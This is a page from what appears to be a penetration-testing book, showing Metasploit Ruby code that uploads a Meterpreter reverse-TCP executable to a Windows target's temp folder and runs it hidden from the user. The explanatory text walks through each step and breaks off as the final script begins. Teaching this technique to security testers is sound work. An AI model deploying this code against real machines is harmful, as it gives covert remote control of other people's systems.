background image

246

Chapter 16

mul.datastore['PAYLOAD'] = payload
mul.datastore['EXITFUNC'] = 'process'
mul.datastore['ExitOnSession'] = true
mul.exploit_simple(
'Payload'  => mul.datastore['PAYLOAD'],
'RunAsJob' => true
 )

We define our payload as a 

windows/meterpreter/reverse_tcp

 at  , generate 

the payload calling the 

client.framework.payloads.create(payload)

 at  , and 

specify the necessary parameters to create the multi-handler. These are all 
the required fields we need to set our payload using the 

LHOST

 and 

LPORT

 options 

and create a listener.

Next we create our executable (

win32pe meterpreter

), upload it to our 

target machine, and execute it:

 if client.platform =~ /win32|win64/

tempdir = client.fs.file.expand_path("%TEMP%")

        print_status("Uploading meterpreter to temp directory...")
        raw = pay.generate

exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)

        tempexe = tempdir + "\\" + filename
        tempexe.gsub!("\\\\", "\\")
        fd = client.fs.file.new(tempexe, "wb")
        fd.write(exe)

fd.close

        print_status("Executing the payload on the system...")
        execute_payload = "#{tempdir}\\#{filename}"
       pid = session.sys.process.execute(execute_payload, nil, {'Hidden' => true})

end

The variables called 

#{

something

}

 have already been defined within the 

script and will be called later. Notice that we already defined 

tempdir

 and 

filename

. Moving into the script, we first include an if statement to detect 

whether the platform we are targeting is a Windows-based system  ; otherwise, 
the attack won’t run. We then expand the temp directory   on the target 
machine; this would be the equivalent of 

%TEMP%

. Next we create a new 

file on the system and write out the new 

EXE

 we just generated from the 

::Msf::Util::EXE.to_win32pe

   call. Remember that we set the 

session.sys

.process.execute

 to 

Hidden

 so that the target user won’t see anything pop 

up on his side.

Putting this all together, our final script should look something like this:

# Meterpreter script for uploading and executing another meterpreter exe

info = "Simple script for uploading and executing an additional meterpreter payload"

#
# Options